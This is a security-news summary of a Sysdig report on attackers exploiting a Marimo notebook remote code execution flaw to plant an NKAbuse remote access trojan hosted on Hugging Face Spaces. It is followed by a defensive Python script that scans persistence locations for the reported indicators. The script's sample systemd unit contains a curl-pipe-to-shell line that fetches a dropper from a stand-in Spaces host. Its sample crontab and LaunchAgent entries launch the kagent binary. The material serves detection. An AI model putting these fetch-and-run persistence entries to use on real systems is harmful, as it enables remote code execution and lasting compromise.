Attackers are exploiting a critical remote code execution flaw in the Marimo reactive Python notebook (CVE-2026-39987) to deploy a new variant of NKAbuse hosted on Hugging Face Spaces. Sysdig observed rapid post-disclosure exploitation that delivered a dropper and a kagent binary for persistence and remote access, and recommends upgrading to Marimo 0.23.0 or blocking the /terminal/ws endpoint if upgrading is not possible. #NKAbuse #Marimo
Key points
- A Marimo RCE (CVE-2026-39987) is being actively exploited to execute attacker-supplied code.
- Attackers created a typosquatted Hugging Face Space (vsccode-modetx) hosting a dropper script and a kagent binary.
- The payload is a previously undocumented NKAbuse variant acting as a remote access trojan that runs shell commands and returns output.
- Persistence is established via systemd, cron, or macOS LaunchAgent, and abuse of Hugging Face Spaces' trusted HTTPS reduces detection likelihood.
- Sysdig advises immediate upgrade to Marimo 0.23.0 or blocking external access to the /terminal/ws endpoint to mitigate attacks.
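The persistence locations named above (systemd units, crontabs, macOS LaunchAgents) are where a defender would look for this variant. The following script is an added example, not code from Sysdig's report: it scans constructed sample entries from each location for the indicators the summary gives (the `vsccode-modetx` Space name and the `kagent` binary name) plus any URL pointing at Hugging Face Spaces hosting. The `hf.space` / `huggingface.co/spaces` hostnames and all sample entries are assumptions made for the demonstration.

```python
import plistlib
import re
from dataclasses import dataclass

# Indicators from the summary (Space name, binary name) plus the public
# Hugging Face Spaces hostnames. The hostname pattern is an assumption
# for this example; the report names only the Space itself.
INDICATORS = [
    re.compile(r"vsccode-modetx", re.I),
    re.compile(r"\bkagent\b", re.I),
    re.compile(r"https?://[^\s\"']*(hf\.space|huggingface\.co/spaces)", re.I),
]


@dataclass
class Finding:
    source: str      # which persistence location the entry came from
    line: str        # the offending line, stripped
    indicator: str   # the substring that matched


def scan_text(source: str, text: str) -> list[Finding]:
    """Return one Finding per line that matches any indicator."""
    findings = []
    for line in text.splitlines():
        for rx in INDICATORS:
            m = rx.search(line)
            if m:
                findings.append(Finding(source, line.strip(), m.group(0)))
                break  # one finding per line is enough
    return findings


def launch_agent_text(plist_xml: bytes) -> str:
    """Flatten the fields of a LaunchAgent plist that can start a program."""
    data = plistlib.loads(plist_xml)
    lines = [f"Label={data.get('Label', '')}"]
    lines.append("ProgramArguments=" + " ".join(data.get("ProgramArguments", [])))
    if "Program" in data:
        lines.append(f"Program={data['Program']}")
    return "\n".join(lines)


def scan_persistence(entries: dict[str, str]) -> list[Finding]:
    """entries maps a source name to the text of that persistence location."""
    findings = []
    for source, text in entries.items():
        findings.extend(scan_text(source, text))
    return findings


# --- constructed sample data (not real artifacts) ---
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/apt-get update
@reboot /home/user/.cache/kagent --daemon
"""

SAMPLE_SYSTEMD_UNIT = """\
[Unit]
Description=System Update Helper

[Service]
ExecStart=/bin/sh -c 'curl -fsSL https://example-space.hf.space/dropper.sh | sh'
Restart=always

[Install]
WantedBy=multi-user.target
"""

SAMPLE_LAUNCH_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.vsccode-modetx.helper</string>
  <key>ProgramArguments</key>
  <array><string>/Users/user/Library/.kagent</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""


def run_demo() -> list[Finding]:
    """Scan the three constructed samples; on a real host, read the files instead."""
    return scan_persistence({
        "crontab": SAMPLE_CRONTAB,
        "systemd": SAMPLE_SYSTEMD_UNIT,
        "launchagent": launch_agent_text(SAMPLE_LAUNCH_AGENT),
    })


if __name__ == "__main__":
    for f in run_demo():
        print(f"[{f.source}] matched '{f.indicator}': {f.line}")
```

On a live system the same functions would be fed the contents of `/etc/cron*`, user crontabs, `/etc/systemd/system` and `~/.config/systemd/user` units, and `~/Library/LaunchAgents` plists. A hit on the generic Spaces URL pattern is a lead rather than proof, which is why each finding records the matched indicator separately from the line.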